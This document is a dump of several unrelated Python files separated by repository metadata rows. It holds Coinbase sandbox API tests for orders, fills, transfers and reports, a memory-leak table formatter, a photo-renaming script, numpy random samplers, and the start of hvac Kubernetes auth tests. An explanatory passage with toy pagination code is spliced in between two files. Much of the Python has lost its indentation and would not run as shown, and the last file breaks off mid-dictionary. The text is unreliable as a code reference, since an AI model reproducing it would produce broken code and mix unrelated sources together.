self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
await asyncio.sleep(.5)
# Funds
funds = 100 + random.randint(1, 10)
order = await self.auth_client.market_order(side, 'BTC-USD', funds=funds)
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'funds', 'id', 'post_only', 'product_id', 'settled', 'side',
'specified_funds', 'status', 'stp', 'type'}
if side == 'sell':
keys.add('size')
self.assertEqual(order.keys(), keys)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(float(order['specified_funds']), funds)
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
await asyncio.sleep(.5)
# client_oid
client_oid = str(uuid4())
order = await self.auth_client.market_order('sell', 'BTC-USD', funds=100,
client_oid=client_oid, stp='dc')
self.assertEqual(order.keys(), keys)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'sell')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(float(order['funds']), 100)
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
await asyncio.sleep(.5)
# This really shouldn't raise an error, but as of 11/18, the Coinbase
# sandbox won't accept an stp other than dc even though the Coinbase API
# documentation claims otherwise.
with self.assertRaises(APIRequestError):
order = await self.auth_client.market_order('sell', 'BTC-USD',
funds=100, client_oid=client_oid, stp='cb')
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_market_order_stop(self):
# Assumes cancel works
# stop loss
order = await self.auth_client.market_order('sell', 'BTC-USD', .001,
stop='loss', stop_price=2.5)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'product_id', 'settled', 'side', 'size',
'status', 'stop', 'stop_price', 'stp', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'sell')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
self.assertEqual(order['stop'], 'loss')
self.assertEqual(float(order['stop_price']), 2.5)
await asyncio.sleep(0.5)
# stop entry
order = await self.auth_client.market_order('buy', 'BTC-USD', .001,
stop='entry', stop_price=10000)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'funds', 'id', 'post_only', 'product_id', 'settled', 'side',
'size', 'status', 'stop', 'stop_price', 'stp', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'buy')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
self.assertEqual(order['stop'], 'entry')
self.assertEqual(float(order['stop_price']), 10000)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_cancel(self):
# Assumes limit_order and market_order work.
l_order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=1, size=1)
m_order = await self.auth_client.market_order('sell', 'BTC-USD', .001)
s_order = await self.auth_client.limit_order('sell', 'BTC-USD', 2, 5,
stop='loss', stop_price=10)
resp = await self.auth_client.cancel(l_order['id'])
self.assertEqual(len(resp), 1)
self.assertEqual(resp[0], l_order['id'])
with self.assertRaises(APIRequestError):
await self.auth_client.cancel(m_order['id'])
resp = await self.auth_client.cancel(s_order['id'])
self.assertEqual(len(resp), 1)
self.assertEqual(resp[0], s_order['id'])
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_cancel_all(self):
# Assumes market_order, limit_order, and orders work
await self.auth_client.cancel_all(stop=True)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 0)
await asyncio.sleep(0.5)
for price in (1, 2, 3):
order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=price, size=1)
await asyncio.sleep(0.5)
for price in (20000, 30000, 40000):
order = await self.auth_client.limit_order('sell', 'LTC-USD',
price=price, size=0.01)
await asyncio.sleep(0.5)
order = await self.auth_client.limit_order('buy', 'ETH-USD', 1, .01)
order = await self.auth_client.market_order('sell', 'LTC-USD', .02,
stop='loss', stop_price=1)
order = await self.auth_client.limit_order('buy', 'LTC-USD', 8000, .01,
stop='entry', stop_price=6500)
order = await self.auth_client.market_order('buy', 'ETH-USD', .03,
stop='entry', stop_price=2000)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 10)
resp = await self.auth_client.cancel_all('BTC-USD')
self.assertEqual(len(resp), 3)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 7)
resp = await self.auth_client.cancel_all()
self.assertEqual(len(resp), 4)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 3)
resp = await self.auth_client.cancel_all(product_id='LTC-USD', stop=True)
self.assertEqual(len(resp), 2)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 1)
resp = await self.auth_client.cancel_all(stop=True)
self.assertEqual(len(resp), 1)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(orders, [])
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_orders(self):
# Assumes limit_order, market_order, and cancel_all work
await self.auth_client.cancel_all(stop=True)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 0)
open_ids = []
for i in range(1, 4):
price = 1 + i / 10
size = .001 * i
order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=price, size=size)
open_ids.append(order['id'])
open_orders, _, _ = await self.auth_client.orders('open')
self.assertEqual(len(open_orders), 3)
self.assertEqual(open_orders[0]['id'], open_ids[2])
self.assertEqual(open_orders[1]['id'], open_ids[1])
self.assertEqual(open_orders[2]['id'], open_ids[0])
active_ids = []
for i in range(1,4):
price = i + 1
stop_price = i
size = .01 * i
order = await self.auth_client.limit_order('sell', 'LTC-USD',
price=price, size=size,
stop='loss', stop_price=stop_price)
active_ids.append(order['id'])
active_orders, _, _ = await self.auth_client.orders('active')
self.assertEqual(len(active_orders), 3)
self.assertEqual(active_orders[0]['id'], active_ids[2])
self.assertEqual(active_orders[1]['id'], active_ids[1])
self.assertEqual(active_orders[2]['id'], active_ids[0])
market_ids = []
for i in range(1,4):
size = 0.001 * i
order = await self.auth_client.market_order('buy', 'BTC-USD',
size=size)
market_ids.append(order['id'])
await asyncio.sleep(0.25)
all_orders, _, _ = await self.auth_client.orders('all')
self.assertGreaterEqual(len(all_orders), 9)
self.assertEqual(all_orders[0]['id'], market_ids[2])
self.assertEqual(all_orders[1]['id'], market_ids[1])
self.assertEqual(all_orders[2]['id'], market_ids[0])
self.assertEqual(all_orders[3]['id'], active_ids[2])
oa_orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertGreaterEqual(len(oa_orders), 6)
self.assertEqual(oa_orders[0]['id'], active_ids[2])
self.assertEqual(oa_orders[1]['id'], active_ids[1])
self.assertEqual(oa_orders[2]['id'], active_ids[0])
self.assertEqual(oa_orders[3]['id'], open_ids[2])
self.assertEqual(oa_orders[4]['id'], open_ids[1])
self.assertEqual(oa_orders[5]['id'], open_ids[0])
oa_btc_orders, _, _ = await self.auth_client.orders(['open', 'active'],
'BTC-USD')
self.assertEqual(oa_btc_orders[0]['id'], open_ids[2])
self.assertEqual(oa_btc_orders[1]['id'], open_ids[1])
self.assertEqual(oa_btc_orders[2]['id'], open_ids[0])
orders, before, after = await self.auth_client.orders('all', limit=5)
self.assertEqual(len(orders), 5)
self.assertEqual(orders[0]['id'], market_ids[2])
self.assertEqual(orders[4]['id'], active_ids[1])
after_orders, after_before, after_after = await self.auth_client.orders(
'all', after=after)
self.assertEqual(after_orders[0]['id'], active_ids[0])
original_orders, _, _ = await self.auth_client.orders('all', before=after_before)
self.assertEqual(original_orders, orders)
await self.auth_client.cancel_all(stop=True)
await asyncio.sleep(.5)
oa_orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(oa_orders), 0)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_get_order(self):
# Assumes limit_order and market_order work
ids = []
for i in range(1, 4):
price = 1 + i/10
size = .001 * i
order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=price, size=size)
ids.append(order['id'])
for i in range(1, 4):
size = .001 * i
order = await self.auth_client.market_order('sell', 'BTC-USD',
size=size)
ids.append(order['id'])
oid = random.choice(ids)
order = await self.auth_client.get_order(oid)
self.assertEqual(order['id'], oid)
oid = random.choice(ids)
order = await self.auth_client.get_order(oid)
self.assertEqual(order['id'], oid)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_fills(self):
# Assumes market_order works
orders = []
for i in range(1, 5):
btc_size = .001 * i
ltc_size = .01 * i
side = random.choice(['buy', 'sell'])
order = await self.auth_client.market_order(side, 'BTC-USD', size=btc_size)
orders.append(order)
await asyncio.sleep(.25)
order = await self.auth_client.market_order(side, 'LTC-USD', size=ltc_size)
orders.append(order)
await asyncio.sleep(.25)
fills, _, _ = await self.auth_client.fills(product_id='BTC-USD')
keys = {'created_at', 'fee', 'liquidity', 'order_id', 'price',
'product_id', 'profile_id', 'settled', 'side', 'size',
'trade_id', 'usd_volume', 'user_id'}
self.assertGreaterEqual(len(fills), 4)
self.assertEqual(fills[0]['order_id'], orders[6]['id'])
fills, before, after = await self.auth_client.fills(product_id='LTC-USD', limit=3)
self.assertEqual(len(fills), 3)
self.assertEqual(fills[0]['order_id'], orders[7]['id'])
after_fills, after_before, after_after = await self.auth_client.fills(
product_id='LTC-USD', after=after)
self.assertLess(after_fills[0]['trade_id'], fills[-1]['trade_id'])
original_fills, _, _ = await self.auth_client.fills(product_id='LTC-USD',
before=after_before)
self.assertEqual(original_fills, fills)
order = random.choice(orders)
fills, _, _ = await self.auth_client.fills(order_id=order['id'])
self.assertGreaterEqual(len(fills), 1)
total = 0
for fill in fills:
total += float(fill['size'])
self.assertAlmostEqual(total, float(order['size']))
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_payment_methods(self):
keys = {'id', 'type', 'name', 'currency', 'primary_buy', 'primary_sell',
'allow_buy', 'allow_sell', 'allow_deposit', 'allow_withdraw',
'limits'}
methods = await self.auth_client.payment_methods()
self.assertIsInstance(methods, list)
self.assertIsInstance(methods[0], dict)
self.assertGreaterEqual(methods[0].keys(), keys)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_coinbase_accounts(self):
keys = {'id', 'name', 'balance', 'currency', 'type', 'primary', 'active'}
accounts = await self.auth_client.coinbase_accounts()
self.assertIsInstance(accounts, list)
self.assertIsInstance(accounts[0], dict)
self.assertGreaterEqual(accounts[0].keys(), keys)
@expectedFailure
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_PAYMENT_METHOD,
"Auth credentials, test USD account, and test USD payment method required.")
async def test_deposit_payment_method(self):
# As of 11/25/18 this call returns a 401 error:
# "refresh of oauth token failed"
resp = await self.auth_client.deposit_payment_method(1500, 'USD',
TEST_USD_PAYMENT_METHOD)
keys = {'amount', 'currency', 'id', 'payout_at'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(float(resp['amount']), 1500.0)
self.assertEqual(resp['currency'], 'USD')
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_COINBASE_ACCOUNT,
"Auth credentials, test USD account, and test USD Coinbase account required")
async def test_deposit_coinbase(self):
resp = await self.auth_client.deposit_coinbase(150, 'USD',
TEST_USD_COINBASE_ACCOUNT)
keys = {'amount', 'currency', 'id'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(resp['currency'], 'USD')
self.assertEqual(float(resp['amount']), 150.0)
@expectedFailure
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_PAYMENT_METHOD,
"Auth credentials, test USD account, and test USD payment method required.")
async def test_withdraw_payment_method(self):
# As of 11/25/18 this call returns a 401 error:
# "refresh of oauth token failed"
resp = await self.auth_client.withdraw_payment_method(1500, 'USD',
TEST_USD_PAYMENT_METHOD)
keys = {'amount', 'currency', 'id', 'payout_at'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(float(resp['amount']), 1500.0)
self.assertEqual(resp['currency'], 'USD')
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_COINBASE_ACCOUNT,
"Auth credentials, test USD account, and test USD Coinbase account required")
async def test_withdraw_coinbase(self):
resp = await self.auth_client.withdraw_coinbase(75, 'USD',
TEST_USD_COINBASE_ACCOUNT)
keys = {'amount', 'currency', 'id'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(resp['currency'], 'USD')
self.assertEqual(float(resp['amount']), 75.0)
@expectedFailure
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_withdraw_crypto(self):
# As of 11/25/18 this call returns a 401 error:
# "refresh of oauth token failed - The funds were transferred to
# Coinbase for processing, but failed to withdraw to
# 0x5ad5769cd04681FeD900BCE3DDc877B50E83d469. Please manually withdraw
# from Coinbase."
address = "0x5ad5769cd04681FeD900BCE3DDc877B50E83d469"
resp = await self.auth_client.withdraw_crypto(.001, 'LTC', address)
@expectedFailure
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_stablecoin_conversion(self):
# As of 11/25/18 this call returns a 400 error:
# "USDC is not enabled for your account"
resp = await self.auth_client.stablecoin_conversion('USD', 'USDC', 100)
keys = {'amount', 'id', 'from', 'from_account_id', 'to', 'to_account_id'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(float(resp['amount']), 100.0)
self.assertEqual(resp['from'], 'USD')
self.assertEqual(resp['to'], 'USDC')
@expectedFailure
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_fees(self):
# As of 10/15/19, the Sandbox server returns a 500 error:
# "Internal server error"
keys = {'maker_fee_rate', 'taker_fee_rate', 'usd_volume'}
fees = await self.auth_client.fees()
self.assertIsInstance(fees, dict)
self.assertEqual(fees.keys(), keys)
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_reports(self):
# Combines tests for create_report and report_status
orders = []
for i in range(1, 4):
size = .001 * i
side = random.choice(['buy', 'sell'])
order = await self.auth_client.market_order(side, 'BTC-USD', size=size)
orders.append(order)
await asyncio.sleep(.25)
keys = {'id', 'type', 'status'}
end = datetime.utcnow()
start = end - timedelta(days=1)
end = end.isoformat()
start = start.isoformat()
resp1 = await self.auth_client.create_report('account', start, end,
account_id=TEST_BTC_ACCOUNT)
self.assertIsInstance(resp1, dict)
self.assertEqual(resp1.keys(), keys)
self.assertEqual(resp1['type'], 'account')
resp2 = await self.auth_client.create_report('fills', start, end,
product_id='BTC-USD')
self.assertIsInstance(resp2, dict)
self.assertEqual(resp2.keys(), keys)
self.assertEqual(resp2['type'], 'fills')
resp3 = await self.auth_client.create_report('fills', start, end,
product_id='BTC-USD', report_format='csv',
email='test@example.com')
self.assertIsInstance(resp3, dict)
self.assertEqual(resp3.keys(), keys)
self.assertEqual(resp3['type'], 'fills')
await asyncio.sleep(10)
status1 = await self.auth_client.report_status(resp1['id'])
keys = {'completed_at', 'created_at', 'expires_at', 'file_url', 'id',
'params', 'status', 'type', 'user_id'}
statuses = {'pending', 'creating', 'ready'}
self.assertIsInstance(status1, dict)
self.assertEqual(status1.keys(), keys)
self.assertEqual(status1['id'], resp1['id'])
self.assertEqual(status1['type'], 'account')
self.assertIn(status1['status'], statuses)
self.assertEqual(status1['params']['start_date'], start)
self.assertEqual(status1['params']['end_date'], end)
self.assertEqual(status1['params']['format'], 'pdf')
self.assertEqual(status1['params']['account_id'], TEST_BTC_ACCOUNT)
status2 = await self.auth_client.report_status(resp2['id'])
self.assertIsInstance(status2, dict)
self.assertEqual(status2.keys(), keys)
self.assertEqual(status2['id'], resp2['id'])
self.assertEqual(status2['type'], 'fills')
self.assertIn(status2['status'], statuses)
self.assertEqual(status2['params']['start_date'], start)
self.assertEqual(status2['params']['end_date'], end)
self.assertEqual(status2['params']['format'], 'pdf')
self.assertEqual(status2['params']['product_id'], 'BTC-USD')
status3 = await self.auth_client.report_status(resp3['id'])
self.assertIsInstance(status3, dict)
self.assertEqual(status3.keys(), keys)
self.assertEqual(status3['id'], resp3['id'])
self.assertEqual(status3['type'], 'fills')
self.assertIn(status3['status'], statuses)
self.assertEqual(status3['params']['start_date'], start)
self.assertEqual(status3['params']['end_date'], end)
self.assertEqual(status3['params']['email'], 'test@example.com')
self.assertEqual(status3['params']['format'], 'csv')
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_trailing_volume(self):
tv = await self.auth_client.trailing_volume()
keys = {'product_id', 'volume', 'exchange_volume', 'recorded_at'}
self.assertIsInstance(tv, list)
self.assertIsInstance(tv[0], dict)
self.assertEqual(tv[0].keys(), keys)
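Both test_orders and test_fills above walk Coinbase-style cursor pagination: each call returns a page plus before/after cursors, paging forward with `after` and back with `before`. The mechanics can be sketched with a toy, stdlib-only pager; `paginate` and the id list are illustrative inventions, not part of the client under test:

```python
def paginate(items, limit=3, before=None, after=None):
    """Toy newest-first cursor pager: cursors are item ids."""
    if after is not None:                      # page of strictly older items
        start = items.index(after) + 1
        page = items[start:start + limit]
    elif before is not None:                   # page of strictly newer items
        end = items.index(before)
        page = items[max(0, end - limit):end]
    else:                                      # first (newest) page
        page = items[:limit]
    new_before = page[0] if page else None     # cursor toward newer results
    new_after = page[-1] if page else None     # cursor toward older results
    return page, new_before, new_after

ids = list(range(10, 0, -1))                   # 10 is the newest id
page1, before1, after1 = paginate(ids)                 # [10, 9, 8]
page2, before2, after2 = paginate(ids, after=after1)   # [7, 6, 5]
page1_again, _, _ = paginate(ids, before=before2)      # [10, 9, 8]
```

As the tests assert, fetching the next page with `after` and then requesting `before` with the new page's newer-side cursor recovers the original page.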
783e184c54f1db06b7ea583543c4cf885d8b04a4 | 1,315 | py | Python | web2py/applications/rip/modules/parseLogic.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | ["Apache-2.0"] | 1 | 2019-10-02T13:25:03.000Z | 2019-10-02T13:25:03.000Z | web2py/applications/rip/modules/parseLogic.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | ["Apache-2.0"] | null | null | null | web2py/applications/rip/modules/parseLogic.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | ["Apache-2.0"] | 1 | 2021-11-05T09:51:02.000Z | 2021-11-05T09:51:02.000Z
import re
# Per-service leak summary, each entry formatted as
# "<leaked chunk count>: <leaked bytes hex> (<leaked bytes decimal>)"
final_result_array = {'hvc': '151: 0x10b8 (4,280) ',
    'applmgmt': '76: 0x7a0 (1,952) ', 'statsmonitor': '0: 0x0 (0) ', 'analytics': '643: 0x5cb8 (23,736) ',
    'rhttpproxy': '0: 0x0 (0) ', 'vapi-endpoint': '912: 0x6d60 (28,000) ', 'vsm': '202: 0x1d90 (7,568) ',
    'vmonapi': '71: 0x6a8 (1,704) ', 'vcha': '9: 0x138 (312) ', 'updatemgr': '1: 0x48 (72) ',
    'vsan-health': '75: 0x708 (1,800) ', 'vmware-vpostgres': '68: 0x10c0 (4,288) ',
    'eam': '376: 0x2fb0 (12,208) ', 'cis-license': '470: 0x2f50 (12,112) ', 'certificatemanagement': '131: 0xef8 (3,832) ',
    'sca': '420: 0x3140 (12,608) ', 'pschealth': '0: 0x0 (0) ', 'perfcharts': '470: 0x3af0 (15,088) ',
    'content-library': '957: 0x8778 (34,680) ', 'lookupsvc': '363: 0x27c8 (10,184) ',
    'trustmanagement': '153: 0x1108 (4,360) ', 'vpxd-svcs': '880: 0x5690 (22,160) '}

service_list = sorted(final_result_array)
final_output = ''
for service_analyzed in service_list:
    # main_logger.debug("THREAD - %s - Result %s" % (service_analyzed, final_result_array[service_analyzed]))
    analysis_array = str(final_result_array[service_analyzed]).split(':')
    chunks_leaked = analysis_array[0]
    mem_leaks = analysis_array[1]
    final_output += '{:^25}{:^25}{:^30}'.format(service_analyzed, chunks_leaked, mem_leaks) + "\n"
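The module imports re but this snippet never uses it. One natural use, shown here purely as an illustration with a made-up entry string, is pulling the chunk count and decimal byte count out of a single summary entry:

```python
import re

entry = '151: 0x10b8 (4,280) '  # "<chunks>: <hex bytes> (<decimal bytes>)"
m = re.match(r'(\d+): (0x[0-9a-fA-F]+) \(([\d,]+)\)', entry.strip())
chunks_leaked = int(m.group(1))                    # leaked chunk count
mem_leak_bytes = int(m.group(3).replace(',', ''))  # decimal byte count
```

The hex field and the parenthesized decimal field describe the same quantity, so they should always agree after parsing.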
7846af745a3479a86fe8eba7b12a1d06be8e19d8 | 2,286 | py | Python | PhotoOrg.py | rdgao/PhotoOrg | f45218d17702f2ff93e43c857e27913a174fb8cf | ["MIT"] | 2 | 2017-06-02T02:00:47.000Z | 2020-09-05T19:04:10.000Z | PhotoOrg.py | rdgao/PhotoOrg | f45218d17702f2ff93e43c857e27913a174fb8cf | ["MIT"] | null | null | null | PhotoOrg.py | rdgao/PhotoOrg | f45218d17702f2ff93e43c857e27913a174fb8cf | ["MIT"] | null | null | null
# Richard Gao, 2014
# Library of code for image file manipulation and statistic gathering
from os import listdir, path, rename
from datetime import datetime
def findFiles(dir):
#get a list of all pictures in the directory
dir = checkFolder(dir)
if dir is None: return
#search for target extensions
imgExt = ("jpg", "jpeg", "png", "bmp", "mov", "mp4")
allFiles = []
for file in listdir(dir):
#case invariance
if file.lower().endswith(imgExt):
allFiles.append(dir+file)
print("{0} files found.".format(len(allFiles)))
#return a list of all target files
return allFiles
def getFileTime(f_name):
#return the modified time of the file f_name, both in epoch and in regular time
ts = path.getmtime(f_name)
tout = (ts, str(datetime.fromtimestamp(ts).strftime('%Y_%m_%d_%H_%M_%S')))
return tout
def renameAll(dir):
#rename all files in a directory based on their date
#check for invalid directory
dir = checkFolder(dir)
if dir is None: return
#search for all files in a folder
allFiles = findFiles(dir)
numRenamed = 0
for file in allFiles:
#find file extension
ext = path.splitext(file)[1].lower()
#get target name from photo date
nameDate = getFileTime(file)[1]
#rename with regular time
newName = dir+ nameDate + ext
if not file==newName:
#rename only if file name is not already proper name
ctr=0
while path.exists(newName):
#if path name already exists and is not itself, get version postfix
if newName==file:
break
else:
#in case of duplicate file names
ctr+=1
newName = dir+nameDate+"_V"+str(ctr)+ext
if not file==newName:
rename(file,newName)
numRenamed+=1
# report rename statistics
print('%' * 25 + '\n' + '{0}/{1} files renamed in:\n{2}\n'.format(numRenamed, len(allFiles), dir) + '%' * 25)
def getStats(dir):
#check for invalid directory
dir = checkFolder(dir)
if dir is None: return
#search for all files in a folder
allFiles = findFiles(dir)
stats=[]
for file in allFiles:
stats.append(getFileTime(file)[0])
print(stats)
def checkFolder(dir):
#fix directory if doesn't end with '/'
if not dir.endswith("/"):
dir = dir + '/'
#check for existence of directory
if path.exists(dir):
return dir
else:
print('%' * 25 + "\nGiven path does not exist: \n" + dir + '\n' + '%' * 25)
return None
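The naming scheme from getFileTime/renameAll can be exercised standalone. This sketch re-implements the same getmtime/strftime logic against a throwaway temp file so it runs without the module; the temp file stands in for a photo:

```python
import os
import tempfile
from datetime import datetime

# create a stand-in "photo" to rename
with tempfile.NamedTemporaryFile(suffix='.jpg', delete=False) as f:
    f.write(b'fake image bytes')
    tmp_path = f.name

ts = os.path.getmtime(tmp_path)  # modified time, as getFileTime reads it
stamp = datetime.fromtimestamp(ts).strftime('%Y_%m_%d_%H_%M_%S')
new_path = os.path.join(os.path.dirname(tmp_path), stamp + '.jpg')
# renameAll would move tmp_path to a name like 2014_07_01_12_30_05.jpg
os.remove(tmp_path)
```

The stamp is always a fixed-width `YYYY_MM_DD_HH_MM_SS` string, which is what makes the duplicate-name `_V<n>` postfix logic in renameAll necessary for photos taken in the same second.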
7846bd187a642e3509aeeb9b0be6e8ea1276892b | 2,821 | py | Python | torchlib/utils/random/sampler.py | vermouth1992/torchlib | 63b2bedb40f670b2d9fbfc0daeab4a8d44623095 | ["MIT"] | 3 | 2019-07-23T21:32:36.000Z | 2022-02-04T23:13:30.000Z | torchlib/utils/random/sampler.py | Sayani21/mbrl-hvac | eb0e2213cc2734b1a8f83e485180cc622ffced5d | ["MIT"] | 1 | 2022-03-12T00:52:44.000Z | 2022-03-12T00:52:44.000Z | torchlib/utils/random/sampler.py | Sayani21/mbrl-hvac | eb0e2213cc2734b1a8f83e485180cc622ffced5d | ["MIT"] | 1 | 2019-07-23T21:32:23.000Z | 2019-07-23T21:32:23.000Z
"""
A sampler defines a method to sample random data from certain distribution.
"""
from typing import List
import numpy as np
class BaseSampler(object):
def __init__(self):
pass
def sample(self, shape, *args):
raise NotImplementedError
class IntSampler(BaseSampler):
def __init__(self, low, high=None):
super(IntSampler, self).__init__()
if high is None:
self.low = 0
self.high = low
else:
self.low = low
self.high = high
def sample(self, shape, *args):
return np.random.randint(low=self.low, high=self.high, size=shape, dtype=np.int64)
class UniformSampler(BaseSampler):
def __init__(self, low, high):
super(UniformSampler, self).__init__()
self.low = np.array(low)
self.high = np.array(high)
assert self.low.shape == self.high.shape, 'The shape of low and high must be the same. Got low type {} and high type {}'.format(
self.low.shape, self.high.shape)
def sample(self, shape, *args):
return np.random.uniform(low=self.low, high=self.high, size=shape + self.low.shape).astype(np.float32)
class GaussianSampler(BaseSampler):
def __init__(self, mu=0.0, sigma=1.0):
super(GaussianSampler, self).__init__()
self.mu = mu
self.sigma = sigma
def sample(self, shape, *args):
return np.random.normal(self.mu, self.sigma, shape)
class GaussianMixtureSampler(BaseSampler):
""" Sample from GMM with prior probability distribution """
def __init__(self, mu: List, sigma: List, prob=None):
assert type(mu) == list and type(sigma) == list, 'mu and sigma must be list'
assert len(mu) == len(sigma), 'length of mu and sigma must be the same'
if type(prob) == list:
assert len(mu) == len(prob) and np.sum(prob) == 1., 'The sum of probability list should be 1.'
super(GaussianMixtureSampler, self).__init__()
self.mu = mu
self.sigma = sigma
self.prob = prob
def sample(self, shape, *args):
ind = np.random.choice(len(self.mu), p=self.prob)
return np.random.randn(*shape) * self.sigma[ind] + self.mu[ind]
class ConditionGaussianSampler(BaseSampler):
""" Conditional Gaussian sampler """
def __init__(self, mu: List, sigma: List):
assert type(mu) == list and type(sigma) == list, 'mu and sigma must be list'
assert len(mu) == len(sigma), 'length of mu and sigma must be the same'
super(ConditionGaussianSampler, self).__init__()
self.mu = np.expand_dims(np.array(mu), axis=1)
self.sigma = np.expand_dims(np.array(sigma), axis=1)
def sample(self, shape, *args):
ind = args[0]
return np.random.randn(*shape) * self.sigma[ind] + self.mu[ind]
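A short usage sketch of the sampler interface. The class body is repeated from UniformSampler above (minus the base class and shape assertion) so the snippet is self-contained; it assumes numpy is installed:

```python
import numpy as np

class UniformSampler:
    def __init__(self, low, high):
        self.low = np.array(low)
        self.high = np.array(high)

    def sample(self, shape, *args):
        # draw `shape` i.i.d. points from the axis-aligned box [low, high)
        return np.random.uniform(low=self.low, high=self.high,
                                 size=shape + self.low.shape).astype(np.float32)

sampler = UniformSampler(low=[-1.0, 0.0], high=[1.0, 10.0])
batch = sampler.sample((5,))   # shape (5, 2): five draws from the 2-d box
```

The requested shape is prepended to the bound shape, so every row is one point of the box: `batch[:, 0]` stays within [-1, 1] and `batch[:, 1]` within [0, 10].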
78547897866cc63cf047c71a1fb0bc84a0a8f551 | 10,079 | py | Python | tests/unit_tests/v1/test_kubernetes_methods.py | ddeka2910/hvac | 80cf3950157bf003ee6622e6db84bb9d6c90e5f1 | ["Apache-2.0"] | 1 | 2020-12-14T04:01:10.000Z | 2020-12-14T04:01:10.000Z | tests/unit_tests/v1/test_kubernetes_methods.py | TerryHowe/hvac | a6b7f904bfaba3c1133ccc7fa5a0cff0d29340c7 | ["Apache-2.0"] | 2 | 2019-07-08T03:09:38.000Z | 2021-07-08T18:17:51.000Z | tests/unit_tests/v1/test_kubernetes_methods.py | TerryHowe/hvac | a6b7f904bfaba3c1133ccc7fa5a0cff0d29340c7 | ["Apache-2.0"] | null | null | null
from unittest import TestCase
import requests_mock
from parameterized import parameterized
from hvac import Client
class TestKubernetesMethods(TestCase):
"""Unit tests providing coverage for Kubernetes auth backend-related methods/routes."""
@parameterized.expand([
("default mount point", None, '127.0.0.1:80', ['test_key']),
("custom mount point", "k8s", 'some_k8s_host.com', ['test_key']),
])
@requests_mock.Mocker()
def test_create_kubernetes_configuration(self, test_label, mount_point, kubernetes_host, pem_keys, requests_mocker):
expected_status_code = 204
mock_url = 'http://localhost:8200/v1/auth/{0}/config'.format(
'kubernetes' if mount_point is None else mount_point,
)
requests_mocker.register_uri(
method='POST',
url=mock_url,
status_code=expected_status_code,
)
client = Client()
test_arguments = dict(
kubernetes_host=kubernetes_host,
pem_keys=pem_keys,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.create_kubernetes_configuration(**test_arguments)
self.assertEqual(
first=expected_status_code,
second=actual_response.status_code,
)
@parameterized.expand([
("default mount point", None),
("custom mount point", "k8s"),
])
@requests_mock.Mocker()
def test_get_kubernetes_configuration(self, test_label, mount_point, requests_mocker):
expected_status_code = 200
mock_response = {
'auth': None,
'data': {
'kubernetes_ca_cert': '',
'kubernetes_host': '127.0.0.1:80',
'pem_keys': ['some key'],
